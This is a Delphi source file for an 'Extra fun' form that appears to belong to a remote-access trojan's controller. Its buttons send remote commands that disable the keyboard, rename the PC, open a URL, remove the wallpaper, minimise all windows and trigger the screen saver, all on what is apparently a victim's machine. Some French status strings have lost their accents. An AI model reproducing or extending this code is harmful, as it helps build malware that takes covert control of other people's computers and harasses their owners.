(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untExtraFun.pas                                 ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of ExtraFun form                    ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untExtraFun;

interface

uses
  SysUtils, Classes, Controls, Forms, StdCtrls,
  Buttons;

type
  TfrmExtraFun = class(TForm)
    GruURL: TGroupBox;
    SpdOpen: TSpeedButton;
    EdtURL: TEdit;
    GruExtra: TGroupBox;
    SpdDisableKey: TSpeedButton;
    SpdOpenMnu: TSpeedButton;
    SpdDeactiveSaver: TSpeedButton;
    SpdRemoveWallPaper: TSpeedButton;
    SpdMinAll: TSpeedButton;
    SpdExecSaver: TSpeedButton;
    GruPCName: TGroupBox;
    SpdChangeName: TSpeedButton;
    LblDesc12: TLabel;
    EdtComp: TEdit;
    procedure SpdChangeNameClick(Sender: TObject);
    procedure SpdOpenClick(Sender: TObject);
    procedure SpdDisableKeyClick(Sender: TObject);
    procedure SpdExecSaverClick(Sender: TObject);
    procedure SpdOpenMnuClick(Sender: TObject);
    procedure SpdDeactiveSaverClick(Sender: TObject);
    procedure SpdRemoveWallPaperClick(Sender: TObject);
    procedure SpdMinAllClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmExtraFun: TfrmExtraFun;

implementation

uses untMain, untCommands;
{$R *.DFM}

procedure TfrmExtraFun.SpdChangeNameClick(Sender: TObject);
begin
   frmMain.strStatus:='Changement du nom PC...';
   frmMain.SendCommand(COMMAND_CHANGE_NAME,EdtComp.Text);
end;

procedure TfrmExtraFun.SpdOpenClick(Sender: TObject);
begin
   frmMain.strStatus:='Ouverture du navigateur...';
   frmMain.SendCommand(COMMAND_OPEN_URL,EdtURL.Text);
end;

procedure TfrmExtraFun.SpdDisableKeyClick(Sender: TObject);
begin
   frmMain.strStatus:='Dsactivation du clavier...';
   frmMain.SendCommand(COMMAND_DISABLE_KEY,'');
end;

procedure TfrmExtraFun.SpdExecSaverClick(Sender: TObject);
begin
   frmMain.strStatus:='Execution du screen saver...';
   frmMain.SendCommand(COMMAND_EXEC_SAVER,'');
end;

procedure TfrmExtraFun.SpdOpenMnuClick(Sender: TObject);
begin
   frmMain.strStatus:='Ouverture start menu...';
   frmMain.SendCommand(COMMAND_OPEN_START,'');
end;

procedure TfrmExtraFun.SpdDeactiveSaverClick(Sender: TObject);
begin
   frmMain.strStatus:='Dsactivation screen saver...';
   frmMain.SendCommand(COMMAND_DISABLE_SAVER,'');
end;

procedure TfrmExtraFun.SpdRemoveWallPaperClick(Sender: TObject);
begin
   frmMain.strStatus:='Dsinstallation du fond d''cran...';
   frmMain.SendCommand(COMMAND_REMOVE_WALL,'');
end;

procedure TfrmExtraFun.SpdMinAllClick(Sender: TObject);
begin
   frmMain.strStatus:='Minimization des fenetres...';
   frmMain.SendCommand(COMMAND_MINIMIZE_ALL,'');
end;

procedure TfrmExtraFun.FormCreate(Sender: TObject);
begin
   Caption:='Extra fun';
end;

end.
